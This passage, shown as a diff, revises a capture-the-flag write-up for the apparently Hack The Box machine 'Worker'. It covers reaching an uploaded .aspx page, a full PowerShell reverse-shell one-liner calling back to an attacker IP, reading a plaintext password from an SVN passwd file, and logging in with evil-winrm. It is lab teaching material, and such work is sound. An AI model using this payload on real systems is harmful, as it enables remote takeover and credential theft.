 Reverse shell

-is the name which you’ve selected during your branching and merging process.
+After that go the the http://subdomain.worker.htb/file-name.aspx where subdomain is the name which you’ve selected during your branching and merging process.
 The subdomain name can be found just below the address bar of your browser.
-FYI..The subdomain I’ve taken is alpha
+FYI..The subdomain I’ve taken is alpha.

 If you’ve done everything correctly, you should be able to see this page.

 From this page we can get the reverse shell.
-I grabbed the reverse shell payload for powershell
+I grabbed the reverse shell payload for powershell and edited the ip and port values.

 powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('your-vpn-ip-addr',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

-Open a netcat listener in your local machine and click on execute
+Open a netcat listener in your local machine and click on execute.

 User flag

-folder and found the username robisl
+I checked the C:\Users folder and found the username robisl.

-After a bit of enumerating, I found that the machine has another volume W:\
+After a bit of enumerating, I found that the machine has another volume W:\.

 Get-Volume

-folder.
-I searched throughout the folder and came across this file named passwd
+After changing the volume, I found the svnrepos folder.
+I searched throughout the folder and came across this file named passwd in the W:\snvrepos\www\conf folder.

-command.
-The password will be in the same line as the name of the user robisl
+I got the contents of the file using the type file-name command.
+The password will be in the same line as the name of the user robisl.

 ./evil-winrm.rb -u robisl -p password-from-passwd-file -i worker.htb

-I found the user flag
+I found the user flag in the C:\Users\robisl\Desktop folder.

 Root flag